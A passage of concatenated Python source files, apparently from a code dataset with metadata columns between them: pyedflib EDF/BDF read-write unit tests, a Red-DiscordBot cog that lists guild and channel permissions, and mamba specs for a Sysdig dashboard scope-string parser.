'prefilter': 'pre1', 'transducer': 'trans1'}
with pyedflib.EdfWriter(self.edf_data_file, 2, file_type=pyedflib.FILETYPE_EDF) as f:
f.setSignalHeader(0,channel_info1)
f.setSignalHeader(1,channel_info2)
data = np.ones(100) * 0.1
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
with pyedflib.EdfReader(self.edf_data_file) as f:
np.testing.assert_equal(f.getLabel(0), 'test_label')
np.testing.assert_equal(f.getPhysicalDimension(0), 'mV')
np.testing.assert_equal(f.getPrefilter(0), 'pre1')
np.testing.assert_equal(f.getTransducer(0), 'trans1')
np.testing.assert_equal(f.getSampleFrequency(0), 100)
self.assertEqual(f.filetype, pyedflib.FILETYPE_EDF)
def test_SampleWritingContextManager(self):
channel_info1 = {'label':'test_label1', 'dimension':'mV', 'sample_rate':100,
'physical_max':1.0,'physical_min':-1.0,
'digital_max':8388607,'digital_min':-8388608,
'prefilter':'pre1','transducer':'trans1'}
channel_info2 = {'label':'test_label2', 'dimension':'mV', 'sample_rate':100,
'physical_max':1.0,'physical_min':-1.0,
'digital_max':8388607,'digital_min':-8388608,
'prefilter':'pre2','transducer':'trans2'}
with pyedflib.EdfWriter(self.bdfplus_data_file, 2, file_type=pyedflib.FILETYPE_BDFPLUS) as f:
f.setSignalHeader(0,channel_info1)
f.setSignalHeader(1,channel_info2)
data1 = np.ones(500) * 0.1
data2 = np.ones(500) * 0.2
data_list = []
data_list.append(data1)
data_list.append(data2)
f.writeSamples(data_list)
with pyedflib.EdfReader(self.bdfplus_data_file) as f:
data1_read = f.readSignal(0)
data2_read = f.readSignal(1)
with pyedflib.EdfReader(self.bdfplus_data_file) as f:
data1_read = f.readSignal(0)
data2_read = f.readSignal(1)
self.assertEqual(f.filetype, pyedflib.FILETYPE_BDFPLUS)
np.testing.assert_equal(len(data1), len(data1_read))
np.testing.assert_equal(len(data2), len(data2_read))
np.testing.assert_almost_equal(data1, data1_read)
np.testing.assert_almost_equal(data2, data2_read)
def test_SampleWriting2(self):
channel_info1 = {'label':'test_label1', 'dimension':'mV', 'sample_rate':100,
'physical_max':1.0,'physical_min':-1.0,
'digital_max':8388607,'digital_min':-8388608,
'prefilter':'pre1','transducer':'trans1'}
channel_info2 = {'label':'test_label2', 'dimension':'mV', 'sample_rate':100,
'physical_max':1.0,'physical_min':-1.0,
'digital_max':8388607,'digital_min':-8388608,
'prefilter':'pre2','transducer':'trans2'}
f = pyedflib.EdfWriter(self.bdfplus_data_file, 2,
file_type=pyedflib.FILETYPE_BDFPLUS)
f.setSignalHeader(0,channel_info1)
f.setSignalHeader(1,channel_info2)
data1 = np.ones(500) * 0.1
data2 = np.ones(500) * 0.2
data_list = []
data_list.append(data1)
data_list.append(data2)
f.writeSamples(data_list)
del f
f = pyedflib.EdfReader(self.bdfplus_data_file)
data1_read = f.readSignal(0)
data2_read = f.readSignal(1)
self.assertEqual(f.filetype, pyedflib.FILETYPE_BDFPLUS)
del f
np.testing.assert_equal(len(data1), len(data1_read))
np.testing.assert_equal(len(data2), len(data2_read))
np.testing.assert_almost_equal(data1, data1_read)
np.testing.assert_almost_equal(data2, data2_read)
def test_SampleWriting_digital(self):
dmin, dmax = [0, 1024]
pmin, pmax = [0, 1.0]
channel_info1 = {'label':'test_label1', 'dimension':'mV', 'sample_rate':100,
'physical_max':pmax,'physical_min':pmin,
'digital_max':dmax,'digital_min':dmin,
'prefilter':'pre1','transducer':'trans1'}
channel_info2 = {'label':'test_label2', 'dimension':'mV', 'sample_rate':100,
'physical_max':pmax,'physical_min':pmin,
'digital_max':dmax,'digital_min':dmin,
'prefilter':'pre2','transducer':'trans2'}
f = pyedflib.EdfWriter(self.edfplus_data_file, 2,
file_type=pyedflib.FILETYPE_EDFPLUS)
f.setSignalHeader(0,channel_info1)
f.setSignalHeader(1,channel_info2)
data1 = np.arange(500, dtype=np.float)
data2 = np.arange(500, dtype=np.float)
data_list = []
data_list.append(data1)
data_list.append(data2)
with np.testing.assert_raises(TypeError):
f.writeSamples(data_list, digital=True)
f.close()
del f
f = pyedflib.EdfWriter(self.edfplus_data_file, 2,
file_type=pyedflib.FILETYPE_EDFPLUS)
f.setSignalHeader(0,channel_info1)
f.setSignalHeader(1,channel_info2)
data1 = np.arange(500, dtype=np.int32)
data2 = np.arange(500, dtype=np.int32)
data_list = []
data_list.append(data1)
data_list.append(data2)
f.writeSamples(data_list, digital=True)
del f
f = pyedflib.EdfReader(self.edfplus_data_file)
data1_read = (f.readSignal(0) - pmin)/((pmax-pmin)/(dmax-dmin)) # converting back to digital
data2_read = (f.readSignal(1) - pmin)/((pmax-pmin)/(dmax-dmin)) # converting back to digital
self.assertEqual(f.filetype, pyedflib.FILETYPE_EDFPLUS)
del f
np.testing.assert_equal(len(data1), len(data1_read))
np.testing.assert_equal(len(data2), len(data2_read))
np.testing.assert_almost_equal(data1, data1_read)
np.testing.assert_almost_equal(data2, data2_read)
def test_TestRoundingEDF(self):
channel_info1 = {'label':'test_label1', 'dimension':'mV', 'sample_rate':100,
'physical_max':1.0,'physical_min':-1.0,
'digital_max':32767,'digital_min':-32768,
'prefilter':'pre1','transducer':'trans1'}
f = pyedflib.EdfWriter(self.edfplus_data_file, 1,
file_type=pyedflib.FILETYPE_EDFPLUS)
f.setSignalHeader(0,channel_info1)
time = np.linspace(0,5,500)
data1 = np.sin(2*np.pi*1*time)
data_list = []
data_list.append(data1)
f.writeSamples(data_list)
del f
f = pyedflib.EdfReader(self.edfplus_data_file)
data1_read = f.readSignal(0)
del f
np.testing.assert_equal(len(data1), len(data1_read))
np.testing.assert_almost_equal(data1, data1_read,decimal=4)
f = pyedflib.EdfWriter(self.edfplus_data_file, 1,
file_type=pyedflib.FILETYPE_EDFPLUS)
f.setSignalHeader(0,channel_info1)
data_list = []
data_list.append(data1_read)
f.writeSamples(data_list)
del f
f = pyedflib.EdfReader(self.edfplus_data_file)
data2_read = f.readSignal(0)
self.assertEqual(f.filetype, pyedflib.FILETYPE_EDFPLUS)
del f
np.testing.assert_equal(len(data1), len(data2_read))
np.testing.assert_almost_equal(data1, data2_read,decimal=4)
np.testing.assert_almost_equal(data1_read, data2_read, decimal=4)
def test_AnnotationWriting(self):
channel_info = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 8388607, 'digital_min': -8388608,
'prefilter': 'pre1', 'transducer': 'trans1'}
f = pyedflib.EdfWriter(self.bdfplus_data_file, 1,
file_type=pyedflib.FILETYPE_BDFPLUS)
f.setSignalHeader(0,channel_info)
data = np.ones(100) * 0.1
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
f.writeAnnotation(1.23, 0.2, u"annotation1_ä")
f.writeAnnotation(0.25, -1, u"annotation2_ü")
f.writeAnnotation(1.25, 0, u"annotation3_ö")
f.writeAnnotation(1.30, -1, u"annotation4_ß")
del f
f = pyedflib.EdfReader(self.bdfplus_data_file)
self.assertEqual(f.filetype, pyedflib.FILETYPE_BDFPLUS)
ann_time, ann_duration, ann_text = f.readAnnotations()
del f
np.testing.assert_almost_equal(ann_time[0], 1.23)
np.testing.assert_almost_equal(ann_duration[0], 0.2)
np.testing.assert_equal(ann_text[0], "annotation1_..")
np.testing.assert_almost_equal(ann_time[1], 0.25)
np.testing.assert_almost_equal(ann_duration[1], -1)
np.testing.assert_equal(ann_text[1], "annotation2_..")
np.testing.assert_almost_equal(ann_time[2], 1.25)
np.testing.assert_almost_equal(ann_duration[2], 0)
np.testing.assert_equal(ann_text[2], "annotation3_..")
np.testing.assert_almost_equal(ann_time[3], 1.30)
np.testing.assert_almost_equal(ann_duration[3], -1)
np.testing.assert_equal(ann_text[3], "annotation4_..")
def test_AnnotationWritingUTF8(self):
channel_info = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 8388607, 'digital_min': -8388608,
'prefilter': u'test', 'transducer': 'trans1'}
f = pyedflib.EdfWriter(self.bdfplus_data_file, 1,
file_type=pyedflib.FILETYPE_BDFPLUS)
f.setSignalHeader(0,channel_info)
data = np.ones(100) * 0.1
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
f.writeAnnotation(1.23, 0.2, u"Zähne")
f.writeAnnotation(0.25, -1, u"Fuß")
f.writeAnnotation(1.25, 0, u"abc")
del f
f = pyedflib.EdfReader(self.bdfplus_data_file)
self.assertEqual(f.filetype, pyedflib.FILETYPE_BDFPLUS)
ann_time, ann_duration, ann_text = f.readAnnotations()
del f
np.testing.assert_almost_equal(ann_time[0], 1.23)
np.testing.assert_almost_equal(ann_duration[0], 0.2)
np.testing.assert_equal(ann_text[0], "Z..hne")
np.testing.assert_almost_equal(ann_time[1], 0.25)
np.testing.assert_almost_equal(ann_duration[1], -1)
np.testing.assert_equal(ann_text[1], "Fu..")
np.testing.assert_almost_equal(ann_time[2], 1.25)
np.testing.assert_almost_equal(ann_duration[2], 0)
np.testing.assert_equal(ann_text[2], "abc")
def test_BytesChars(self):
channel_info = {'label': b'test_label', 'dimension': b'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 8388607, 'digital_min': -8388608,
'prefilter': b' ', 'transducer': b'trans1'}
f = pyedflib.EdfWriter(self.bdfplus_data_file, 1,
file_type=pyedflib.FILETYPE_BDFPLUS)
f.setSignalHeader(0,channel_info)
data = np.ones(100) * 0.1
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
f.writeAnnotation(1.23, 0.2, b'Zaehne')
f.writeAnnotation(0.25, -1, b'Fuss')
f.writeAnnotation(1.25, 0, b'abc')
del f
f = pyedflib.EdfReader(self.bdfplus_data_file)
self.assertEqual(f.filetype, pyedflib.FILETYPE_BDFPLUS)
ann_time, ann_duration, ann_text = f.readAnnotations()
del f
np.testing.assert_almost_equal(ann_time[0], 1.23)
np.testing.assert_almost_equal(ann_duration[0], 0.2)
np.testing.assert_equal(ann_text[0], "Zaehne")
np.testing.assert_almost_equal(ann_time[1], 0.25)
np.testing.assert_almost_equal(ann_duration[1], -1)
np.testing.assert_equal(ann_text[1], "Fuss")
np.testing.assert_almost_equal(ann_time[2], 1.25)
np.testing.assert_almost_equal(ann_duration[2], 0)
np.testing.assert_equal(ann_text[2], "abc")
if __name__ == '__main__':
# run_module_suite(argv=sys.argv)
unittest.main()
| 46.687587
| 121
| 0.599134
| 3,947
| 33,475
| 4.89283
| 0.081834
| 0.06105
| 0.10175
| 0.089064
| 0.866922
| 0.859466
| 0.82617
| 0.808202
| 0.802196
| 0.775787
| 0
| 0.060452
| 0.27062
| 33,475
| 716
| 122
| 46.752793
| 0.730505
| 0.017565
| 0
| 0.753289
| 0
| 0
| 0.14118
| 0.002829
| 0
| 0
| 0
| 0
| 0.254934
| 1
| 0.029605
| false
| 0
| 0.008224
| 0
| 0.039474
| 0.011513
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
71e05a16eecc4ca9b9f978163dd85ed639f94534
| 18,459
|
py
|
Python
|
listpermissions/listpermissions.py
|
i-am-zaidali/Toxic-Cogs
|
088cb364f9920c20879751da6b7333118ba1bf41
|
[
"MIT"
] | 56
|
2019-03-21T21:03:26.000Z
|
2022-03-14T08:26:55.000Z
|
listpermissions/listpermissions.py
|
i-am-zaidali/Toxic-Cogs
|
088cb364f9920c20879751da6b7333118ba1bf41
|
[
"MIT"
] | 38
|
2019-08-20T02:18:27.000Z
|
2022-02-22T11:19:05.000Z
|
listpermissions/listpermissions.py
|
i-am-zaidali/Toxic-Cogs
|
088cb364f9920c20879751da6b7333118ba1bf41
|
[
"MIT"
] | 44
|
2019-07-04T06:17:54.000Z
|
2022-03-25T19:18:31.000Z
|
from typing import Optional, Union
import discord
from fuzzywuzzy import process
from redbot.core import commands
from redbot.core.utils.chat_formatting import pagify
from prettytable import PrettyTable
class ListPermissions(commands.Cog):
"""Get the allowed/disable permissions in a guild or channel for a role or member"""
def __init__(self, bot):
self.bot = bot
async def red_delete_data_for_user(self, **kwargs):
"""This cog does not store user data"""
return
@commands.guild_only()
@commands.group(aliases=["lp"])
async def listpermissions(self, ctx):
"""Generates the permissions of a certain object and puts them in a nice table for you."""
pass
@listpermissions.group(name="guild")
async def lp_guild(self, ctx):
"""Generates the permissions for a role or member guild wide. These will change between channels."""
pass
@lp_guild.command(name="role")
async def guild_role(self, ctx, *, rolename):
"""Generates the permissions of a role.
Role name can be the name of the role (or at least close to it) or the ID of it.
Permissions Values:
True: means that the role has that permission
False: means that the role does not have that permission"""
try:
int(rolename)
isint = True
except ValueError:
isint = False
if not isint:
roles = [role.name for role in ctx.guild.roles]
results = process.extract(rolename, roles, limit=1)
if results[0][1] <= 70:
return await ctx.send("Match was too low to be sure the role was found.")
role = [role for role in ctx.guild.roles if role.name == results[0][0]][0]
else:
try:
role = [role for role in ctx.guild.roles if role.id == int(rolename)][0]
except IndexError:
return await ctx.send("Could not find a role with that ID.")
results = [[role.name]]
t = PrettyTable(["Permission", "Value"])
for perm, value in role.permissions:
t.add_row([perm, value])
sending = f"```ini\n[Permissions for role: {results[0][0]}]```\n```py\n{t}```"
for page in pagify(sending):
await ctx.send(sending)
@lp_guild.command(name="member")
async def guild_member(self, ctx, member: discord.Member = None):
"""Generates the guild wide permissions for a member. This only takes into account their guild permissions, not any for specific channels."""
if not member:
member = ctx.author
permissions = member.guild_permissions
t = PrettyTable(["Permission", "Value"])
for perm, value in permissions:
t.add_row([perm, value])
sending = f"```ini\n[Permissions for user: {member.display_name}] in guild {ctx.guild.name}```\n```py\n{t}```"
for page in pagify(sending):
await ctx.send(sending)
@listpermissions.group(name="channel")
async def lp_channel(self, ctx):
"""Generates the permissions of a channel for either a member or a role."""
pass
@lp_channel.command(name="member")
async def channel_member(
self,
ctx,
member: discord.Member = None,
channel: Union[discord.VoiceChannel, discord.TextChannel, discord.CategoryChannel] = None,
):
"""Generates the permissions for a member in a channel.
Permissions Values:
True: means that the person has that permission
False: means that the person does not have that permission"""
if not channel:
channel = ctx.channel
if not member:
member = ctx.author
permissions = channel.permissions_for(member)
t = PrettyTable(["Permission", "Value"])
for perm, value in permissions:
t.add_row([perm, value])
sending = f"```ini\n[Permissions for user: {member.display_name}] in channel {channel.name}```\n```py\n{t}```"
for page in pagify(sending):
await ctx.send(sending)
@lp_channel.command(name="role")
async def channel_role(
self,
ctx,
channel: Optional[
Union[discord.VoiceChannel, discord.TextChannel, discord.CategoryChannel]
] = None,
*,
rolename,
):
"""Generates the basic permissions for a role in a channel. Note that these are only the basic permissions, True or False will only show when the permissions is different from the default permissions of a role.
Role name can be the name of the role (or at least close to it) or the ID of it.
Permissions Values:
None: means that it depends on the role permissions
True: means that a person can explicitly do that, despite role permissions
False: means that a person can explicitly not do that, despite role permissions
"""
if not channel:
channel = ctx.channel
try:
int(rolename)
isint = True
except ValueError:
isint = False
if not isint:
roles = [role.name for role in ctx.guild.roles]
results = process.extract(rolename, roles, limit=1)
if results[0][1] <= 70:
return await ctx.send("Match was too low to be sure the role was found.")
role = [role for role in ctx.guild.roles if role.name == results[0][0]][0]
else:
try:
role = [role for role in ctx.guild.roles if role.id == int(rolename)][0]
except IndexError:
return await ctx.send("Could not find a role with that ID.")
results = [[role.name]]
permissions = channel.overwrites_for(role)
t = PrettyTable(["Permission", "Value"])
for perm, value in permissions:
t.add_row([perm, value])
sending = f"```ini\n[Permissions for role: {results[0][0]} in channel {channel.name}]```\n```py\n{t}```"
for page in pagify(sending):
await ctx.send(sending)
@commands.guild_only()
@commands.group(aliases=["ap"])
async def availablepermissions(self, ctx):
"""Generates the permissions of a certain object and puts them in a nice table for you. Only shows the available permissions."""
pass
@availablepermissions.group(name="guild")
async def ap_guild(self, ctx):
"""Generates the permissions for a role or member guild wide. These will change between channels."""
pass
@ap_guild.command(name="role")
async def ap_guild_role(self, ctx, *, rolename):
"""Generates the permissions of a role.
Role name can be the name of the role (or at least close to it) or the ID of it.
Permissions Values:
True: means that the role has that permission
False: means that the role does not have that permission"""
try:
int(rolename)
isint = True
except ValueError:
isint = False
if not isint:
roles = [role.name for role in ctx.guild.roles]
results = process.extract(rolename, roles, limit=1)
if results[0][1] <= 70:
return await ctx.send("Match was too low to be sure the role was found.")
role = [role for role in ctx.guild.roles if role.name == results[0][0]][0]
else:
try:
role = [role for role in ctx.guild.roles if role.id == int(rolename)][0]
except IndexError:
return await ctx.send("Could not find a role with that ID.")
results = [[role.name]]
t = PrettyTable(["Permission", "Value"])
for perm, value in role.permissions:
if not value:
continue
t.add_row([perm, value])
sending = f"```ini\n[Available permissions for role: {results[0][0]}]```\n```py\n{t}```"
for page in pagify(sending):
await ctx.send(sending)
@ap_guild.command(name="member")
async def ap_guild_member(self, ctx, member: discord.Member = None):
"""Generates the guild wide permissions for a member. This only takes into account their guild permissions, not any for specific channels."""
if not member:
member = ctx.author
permissions = member.guild_permissions
t = PrettyTable(["Permission", "Value"])
for perm, value in permissions:
if not value:
continue
t.add_row([perm, value])
sending = f"```ini\n[Available Permissions for user: {member.display_name}] in guild {ctx.guild.name}```\n```py\n{t}```"
for page in pagify(sending):
await ctx.send(sending)
@availablepermissions.group(name="channel")
async def ap_channel(self, ctx):
"""Generates the permissions of a channel for either a member or a role."""
pass
@ap_channel.command(name="member")
async def ap_channel_member(
self,
ctx,
member: discord.Member = None,
channel: Union[discord.VoiceChannel, discord.TextChannel, discord.CategoryChannel] = None,
):
"""Generates the permissions for a member in a channel.
Permissions Values:
True: means that the person has that permission
False: means that the person does not have that permission"""
if not channel:
channel = ctx.channel
if not member:
member = ctx.author
permissions = channel.permissions_for(member)
t = PrettyTable(["Permission", "Value"])
for perm, value in permissions:
if not value:
continue
t.add_row([perm, value])
sending = f"```ini\n[Available permissions for user: {member.display_name}] in channel {channel.name}```\n```py\n{t}```"
for page in pagify(sending):
await ctx.send(sending)
@ap_channel.command(name="role")
async def ap_channel_role(
self,
ctx,
channel: Optional[
Union[discord.VoiceChannel, discord.TextChannel, discord.CategoryChannel]
] = None,
*,
rolename,
):
"""Generates the basic permissions for a role in a channel. Note that these are only the basic permissions, True or False will only show when the permissions is different from the default permissions of a role.
Role name can be the name of the role (or at least close to it) or the ID of it.
Permissions Values:
None: means that it depends on the role permissions
True: means that a person can explicitly do that, despite role permissions
False: means that a person can explicitly not do that, despite role permissions
"""
if not channel:
channel = ctx.channel
try:
int(rolename)
isint = True
except ValueError:
isint = False
if not isint:
roles = [role.name for role in ctx.guild.roles]
results = process.extract(rolename, roles, limit=1)
if results[0][1] <= 70:
return await ctx.send("Match was too low to be sure the role was found.")
role = [role for role in ctx.guild.roles if role.name == results[0][0]][0]
else:
try:
role = [role for role in ctx.guild.roles if role.id == int(rolename)][0]
except IndexError:
return await ctx.send("Could not find a role with that ID.")
results = [[role.name]]
permissions = channel.overwrites_for(role)
t = PrettyTable(["Permission", "Value"])
for perm, value in permissions:
if not value:
continue
t.add_row([perm, value])
sending = f"```ini\n[Permissions for role: {results[0][0]} in channel {channel.name}]```\n```py\n{t}```"
for page in pagify(sending):
await ctx.send(sending)
@commands.guild_only()
@commands.group(aliases=["dp"])
async def deniedpermissions(self, ctx):
"""Generates the permissions of a certain object and puts them in a nice table for you. Only shows the denied permissions."""
pass
@deniedpermissions.group(name="guild")
async def dp_guild(self, ctx):
"""Generates the permissions for a role or member guild wide. These will change between channels."""
pass
@dp_guild.command(name="role")
async def dp_guild_role(self, ctx, *, rolename):
"""Generates the permissions of a role.
Role name can be the name of the role (or at least close to it) or the ID of it.
Permissions Values:
True: means that the role has that permission
False: means that the role does not have that permission"""
try:
int(rolename)
isint = True
except ValueError:
isint = False
if not isint:
roles = [role.name for role in ctx.guild.roles]
results = process.extract(rolename, roles, limit=1)
if results[0][1] <= 70:
return await ctx.send("Match was too low to be sure the role was found.")
role = [role for role in ctx.guild.roles if role.name == results[0][0]][0]
else:
try:
role = [role for role in ctx.guild.roles if role.id == int(rolename)][0]
except IndexError:
return await ctx.send("Could not find a role with that ID.")
results = [[role.name]]
t = PrettyTable(["Permission", "Value"])
for perm, value in role.permissions:
if value:
continue
t.add_row([perm, value])
sending = f"```ini\n[Permissions for role: {results[0][0]}]```\n```py\n{t}```"
for page in pagify(sending):
await ctx.send(sending)
@dp_guild.command(name="member")
async def dp_guild_member(self, ctx, member: discord.Member = None):
"""Generates the guild wide permissions for a member. This only takes into account their guild permissions, not any for specific channels."""
if not member:
member = ctx.author
permissions = member.guild_permissions
t = PrettyTable(["Permission", "Value"])
for perm, value in permissions:
if value:
continue
t.add_row([perm, value])
sending = f"```ini\n[Permissions for user: {member.display_name}] in guild {ctx.guild.name}```\n```py\n{t}```"
for page in pagify(sending):
await ctx.send(sending)
@deniedpermissions.group(name="channel")
async def dp_channel(self, ctx):
"""Generates the permissions of a channel for either a member or a role."""
pass
@dp_channel.command(name="member")
async def dp_channel_member(
self,
ctx,
member: discord.Member = None,
channel: Union[discord.VoiceChannel, discord.TextChannel, discord.CategoryChannel] = None,
):
"""Generates the permissions for a member in a channel.
Permissions Values:
True: means that the person has that permission
False: means that the person does not have that permission"""
if not channel:
channel = ctx.channel
if not member:
member = ctx.author
permissions = channel.permissions_for(member)
t = PrettyTable(["Permission", "Value"])
for perm, value in permissions:
if value:
continue
t.add_row([perm, value])
sending = f"```ini\n[Permissions for user: {member.display_name}] in channel {channel.name}```\n```py\n{t}```"
for page in pagify(sending):
await ctx.send(sending)
@dp_channel.command(name="role")
async def dp_channel_role(
self,
ctx,
channel: Optional[
Union[discord.VoiceChannel, discord.TextChannel, discord.CategoryChannel]
] = None,
*,
rolename,
):
"""Generates the basic permissions for a role in a channel. Note that these are only the basic permissions, True or False will only show when the permissions is different from the default permissions of a role.
Role name can be the name of the role (or at least close to it) or the ID of it.
Permissions Values:
None: means that it depends on the role permissions
True: means that a person can explicitly do that, despite role permissions
False: means that a person can explicitly not do that, despite role permissions
"""
if not channel:
channel = ctx.channel
try:
int(rolename)
isint = True
except ValueError:
isint = False
if not isint:
roles = [role.name for role in ctx.guild.roles]
results = process.extract(rolename, roles, limit=1)
if results[0][1] <= 70:
return await ctx.send("Match was too low to be sure the role was found.")
role = [role for role in ctx.guild.roles if role.name == results[0][0]][0]
else:
try:
role = [role for role in ctx.guild.roles if role.id == int(rolename)][0]
except IndexError:
return await ctx.send("Could not find a role with that ID.")
results = [[role.name]]
permissions = channel.overwrites_for(role)
t = PrettyTable(["Permission", "Value"])
for perm, value in permissions:
if value:
continue
t.add_row([perm, value])
sending = f"```ini\n[Permissions for role: {results[0][0]} in channel {channel.name}]```\n```py\n{t}```"
for page in pagify(sending):
await ctx.send(sending)
| 42.434483
| 220
| 0.581451
| 2,316
| 18,459
| 4.601036
| 0.069516
| 0.035473
| 0.027027
| 0.02027
| 0.943037
| 0.928585
| 0.889827
| 0.889827
| 0.889827
| 0.889827
| 0
| 0.005273
| 0.321903
| 18,459
| 434
| 221
| 42.532258
| 0.846049
| 0.004226
| 0
| 0.828746
| 0
| 0.036697
| 0.139535
| 0.039835
| 0
| 0
| 0
| 0
| 0
| 1
| 0.003058
| false
| 0.027523
| 0.018349
| 0
| 0.06422
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e07aa4ada41371debead6ee23c3f43f3bc6b8287
| 7,899
|
py
|
Python
|
specs/monitor/dashboard_converters/dashboard_scope_spec.py
|
dark-vex/sysdig-sdk-python
|
52962a0c283ca12b93a743ae8c5d1639a12b0998
|
[
"MIT"
] | 45
|
2016-04-11T16:50:15.000Z
|
2020-07-11T23:37:51.000Z
|
specs/monitor/dashboard_converters/dashboard_scope_spec.py
|
dark-vex/sysdig-sdk-python
|
52962a0c283ca12b93a743ae8c5d1639a12b0998
|
[
"MIT"
] | 74
|
2016-08-09T17:10:55.000Z
|
2020-07-09T08:36:16.000Z
|
specs/monitor/dashboard_converters/dashboard_scope_spec.py
|
dark-vex/sysdig-sdk-python
|
52962a0c283ca12b93a743ae8c5d1639a12b0998
|
[
"MIT"
] | 39
|
2016-04-20T17:22:23.000Z
|
2020-07-08T17:25:52.000Z
|
from expects import equal, expect, be_false, start_with
from mamba import description, it
from sdcclient.monitor.dashboard_converters import convert_scope_string_to_expression
with description("Dashboard Scopes"):
with it("parses correctly: agent.id is foo"):
param = "agent.id is foo"
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "equals",
"value": ["foo"]
}]]))
with it("parses correctly: agent.id = foo"):
param = "agent.id = foo"
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "equals",
"value": ["foo"]
}]]))
with it('parses correctly: agent.id = "foo"'):
param = 'agent.id = "foo"'
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "equals",
"value": ["foo"]
}]]))
with it('parses correctly: cluster.id-number = "foo-bar"'):
param = 'cluster.id-number = "foo-bar"'
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "cluster.id-number",
"operator": "equals",
"value": ["foo-bar"]
}]]))
with it("parses correctly: agent.id = 'foo'"):
param = "agent.id = 'foo'"
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "equals",
"value": ["foo"]
}]]))
with it("parses correctly: agent.id is not foo"):
param = "agent.id is not foo"
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "notEquals",
"value": ["foo"]
}]]))
with it("parses correctly: agent.id in foo"):
param = "agent.id in foo"
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "in",
"value": ["foo"]
}]]))
with it("parses correctly: agent.id in [foo]"):
param = "agent.id in [foo]"
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "in",
"value": ["foo"]
}]]))
with it("parses correctly: agent.id in [foo, bar]"):
param = "agent.id in [foo, bar]"
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "in",
"value": ["foo", "bar"]
}]]))
with it("parses correctly: agent.id in [foo, bar, baz]"):
param = "agent.id in [foo, bar, baz]"
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "in",
"value": ["foo", "bar", "baz"]
}]]))
with it("parses correctly: agent.id in [foo, bar, baz] and agent.name is 'foobar'"):
param = "agent.id in [foo, bar, baz] and agent.name is 'foobar'"
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "in",
"value": ["foo", "bar", "baz"]
}, {
"displayName": "",
"isVariable": False,
"operand": "agent.name",
"operator": "equals",
"value": ["foobar"]
}]]))
with it("parses correctly: agent.id not in foo"):
param = "agent.id not in foo"
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "notIn",
"value": ["foo"]
}]]))
with it("parses correctly: agent.id not in [foo, bar, baz]"):
param = "agent.id not in [foo, bar, baz]"
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "notIn",
"value": ["foo", "bar", "baz"]
}]]))
with it("parses correctly: agent.id contains foo"):
param = "agent.id contains foo"
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "contains",
"value": ["foo"]
}]]))
with it("parses correctly: agent.id does not contain foo"):
param = "agent.id does not contain foo"
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "notContains",
"value": ["foo"]
}]]))
with it("parses correctly: agent.id starts with foo"):
param = "agent.id starts with foo"
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "startsWith",
"value": ["foo"]
}]]))
with it("returns ok, but empty if scope is None"):
res = convert_scope_string_to_expression(None)
expect(res).to(equal([True, []]))
with it("returns error when parsing incorrect: agent.id starts with [foo, bar]"):
param = "agent.id starts with [foo, bar]"
ok, res = convert_scope_string_to_expression(param)
expect(ok).to(be_false)
expect(res).to(start_with(f"invalid scope: {param}"))
with it("returns error when parsing incorrect: agent.id is [foo, bar]"):
param = "agent.id is [foo, bar]"
ok, res = convert_scope_string_to_expression(param)
expect(ok).to(be_false)
expect(res).to(start_with(f"invalid scope: {param}"))
with it("returns error when parsing incorrect: agent.id contains [foo, bar]"):
param = "agent.id contains [foo, bar]"
